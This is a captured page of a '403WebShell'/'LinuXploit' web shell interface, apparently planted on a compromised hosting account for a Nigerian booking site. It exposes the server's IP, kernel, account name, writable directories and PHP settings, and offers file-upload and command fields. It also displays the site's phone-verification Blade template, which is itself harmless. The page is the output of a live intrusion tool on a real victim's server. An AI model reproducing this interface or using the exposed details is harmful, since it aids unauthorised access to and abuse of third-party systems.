Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.202.169
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/User/Views/frontend/verification/fields/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/User/Views/frontend/verification/fields/phone.blade.php
<div class="form-group">
	<div class="row ">
		<?php
		$fieldName = $field['name_' . app()->getLocale()] ?? $field['name'] ?? $field['id'];
		;?>
		<label class="col-md-3 text-right col-form-label">{{$fieldName}}
			@if(!empty($field['required']))
				<span class="text-danger">*</span>
			@endif
			:
		</label>
		<div class="col-md-{{$value_col_size ?? 4}}">
			@if(empty($only_show_data))
				<input type="text" class="form-control mb-1" id="phone_verify_field" name="verify_data_{{$field['id']}}" value="{{$field['data']}}">
				@if(empty($field['is_verified']))
					<span class="btn btn-sm btn-primary" onclick="sendCodeVerifyPhone('verify_data_{{$field["id"]}}','{{$fieldName}}')">{{__('Verify Phone')}}</span>
				@else
					<a class="badge badge-success" href="#" onclick="return false"><i>{{__("Verified")}}</i></a>
				
				@endif
			@else
				<div class=""><strong>{{$field['data'] ? $field['data'] : __('N/A')}}</strong></div>
				@if(!empty($field['is_verified']))
					<a class="badge badge-success" href="#" onclick="return false"><i>{{__("Verified")}}</i></a>
				@else
					<span class="badge badge-secondary"><i>{{__("Not Verified")}}</i></span>
				@endif
			@endif
		</div>
	</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit